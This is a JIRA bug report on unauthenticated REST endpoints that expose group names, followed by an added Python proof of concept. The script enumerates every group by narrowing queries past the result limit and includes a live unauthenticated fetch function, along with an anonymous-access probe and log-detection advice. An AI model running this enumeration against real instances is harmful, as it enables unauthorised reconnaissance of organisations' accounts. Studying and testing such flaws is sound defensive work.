Details
- Type: Bug
- Resolution: Fixed
- Priority: Medium
- Affects Version/s: 5.1.1, 5.1.4
- 5.01
- 4
Description
The REST endpoints for searching groups and for listing issue resolutions allow anonymous (unauthenticated) access.
The former allows enumeration of all groups on a JIRA instance (by sending multiple queries, as results are limited by jira.ajax.autocomplete.limit). We've verified this on an instance without any public projects, groups or anything else public, running version 5.1.1.
For examples see:
https://jira.atlassian.com/rest/api/2/groups/picker
https://jira.atlassian.com/rest/api/2/resolution
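The enumeration technique the report describes, as an added example that is not part of the original issue and not Atlassian code. It shows how a result cap like jira.ajax.autocomplete.limit is bypassed by narrowing the query one character at a time, plus a probe that reports whether the two endpoints still answer unauthenticated requests. The response shape (header, total, groups) follows the published groups/picker API; the simulated server, its prefix matching, the sample group names and the limit of 3 are constructed for this example.

```python
"""Added example: probe and enumerate via the two unauthenticated REST endpoints
named in the report. The response shape (header/total/groups) follows the
published groups/picker API; the simulated server, its prefix matching and the
sample group names are constructed for this example."""
import json
import string
from urllib.error import HTTPError
from urllib.parse import urlencode
from urllib.request import Request, urlopen

# Characters tried when a truncated result must be narrowed down. Assumed to
# cover the group names in use; extend it if your naming scheme needs more.
ALPHABET = string.ascii_lowercase + string.digits + "-_. "

# Constructed sample: group names on a hypothetical instance.
SAMPLE_GROUPS = [
    "jira-administrators", "jira-developers", "jira-users",
    "site-admins", "finance", "finance-leads", "hr",
]
# Stand-in for jira.ajax.autocomplete.limit; kept small to show truncation.
SAMPLE_LIMIT = 3


def fake_picker(query, groups=SAMPLE_GROUPS, limit=SAMPLE_LIMIT):
    """Offline stand-in for GET /rest/api/2/groups/picker?query=...

    Mirrors the documented response: "total" counts all matching groups,
    "groups" carries at most `limit` of them. Prefix matching is an assumption
    made for the simulation; the enumeration below is complete for substring
    matching as well, since a group's own name always matches itself.
    """
    matches = sorted(g for g in groups if g.lower().startswith(query.lower()))
    shown = matches[:limit]
    return {
        "header": f"Showing {len(shown)} of {len(matches)} matching groups",
        "total": len(matches),
        "groups": [{"name": g, "html": g, "labels": []} for g in shown],
    }


def fetch_picker(base_url, query):
    """Live, unauthenticated query against a real instance (not run offline)."""
    url = (f"{base_url.rstrip('/')}/rest/api/2/groups/picker?"
           f"{urlencode({'query': query})}")
    with urlopen(Request(url, headers={"Accept": "application/json"})) as resp:
        return json.load(resp)


def enumerate_groups(picker, alphabet=ALPHABET):
    """Recover every group name through a picker that caps its results.

    Whenever a response reports more matches than it returned, the query is
    extended by one character at a time, so each narrower query eventually
    fits under the limit. Every group is reached by some prefix of its name.
    """
    found = set()
    pending = [""]                      # empty query: "show everything"
    while pending:
        query = pending.pop()
        resp = picker(query)
        found.update(g["name"] for g in resp["groups"])
        if resp["total"] > len(resp["groups"]):   # truncated by the limit
            pending.extend(query + ch for ch in alphabet)
    return found


def check_anonymous_access(base_url, opener=urlopen):
    """Return {endpoint: HTTP status} for an unauthenticated GET on each
    endpoint from the report; 200 means the fix is not in place."""
    results = {}
    for path in ("/rest/api/2/groups/picker", "/rest/api/2/resolution"):
        req = Request(base_url.rstrip("/") + path,
                      headers={"Accept": "application/json"})
        try:
            with opener(req) as resp:
                results[path] = resp.getcode()
        except HTTPError as err:     # 401/403 once anonymous access is denied
            results[path] = err.code
    return results


if __name__ == "__main__":
    names = enumerate_groups(fake_picker)
    print(f"recovered {len(names)} groups:", sorted(names))
    # Against a live instance (hypothetical host):
    # print(check_anonymous_access("https://jira.example.com"))
    # base = "https://jira.example.com"
    # print(enumerate_groups(lambda q: fetch_picker(base, q)))
```

With the constructed sample and a limit of 3 the empty query is truncated, so the search fans out once over the alphabet and recovers all seven names in 41 requests; a smaller limit simply deepens the prefix tree without losing any group. The number of requests is what a reverse proxy or access log can be tuned to flag: many short, distinct query values from one unauthenticated client in quick succession.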